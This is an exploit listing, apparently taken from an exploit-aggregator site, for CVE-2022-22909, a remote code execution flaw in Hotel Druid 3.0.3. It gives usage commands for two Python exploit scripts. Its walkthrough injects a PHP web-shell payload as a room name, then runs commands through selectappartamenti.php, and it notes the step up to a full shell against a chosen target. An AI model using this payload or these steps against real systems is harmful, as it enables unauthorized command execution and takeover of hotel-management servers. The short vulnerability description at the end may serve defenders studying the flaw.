## https://sploitus.com/exploit?id=83DDB0BC-0474-5AA2-A1AE-DC372D63CFFA
# CVE-2022-22909 Hotel Druid 3.0.3 - Remote Code Execution (RCE)
## Exploit by kaal
### Exploits
1. HotelDruidExploit.py
This Exploit will create new room with our PHP payload as a room name .
Usage :
`$ ./HotelDruidExploit.py -h`

`$ ./HotelDruidExploit.py -u http://127.0.0.1/hoteldruid`

***
2. HotelDruidExploitRoom.py
This Exploit will work if you already know the Room name .
Usage :
`$ ./HotelDruidExploitRoom.py -u "http://127.0.0.1/hoteldruid" -r "abc"`

---
## Exploit Walkthrough :
1). Navigate to Hotel Druid page.
2). Click on Tables -> Rooms

3). In Create New Room field add below php code , and click on Add.
`{${system($_REQUEST[cmd])}}`

4). You will see new room with our payload in the "Room" name field .

5). Go to below link and you will get command Execution , Later you can get Full shell
http://127.0.0.1/hoteldruid/dati/selectappartamenti.php?cmd=whoami
Note : Change the Ip with your hoteldruid target IP.
## Vulnerability Description :
This vulnerability occurs because room names are getting stored inside `/var/www/html/hoteldruid/dati/selectappartamenti.php`

And `selectappartamenti.php` is a PHP file so any PHP code inside that file will get executed by the server.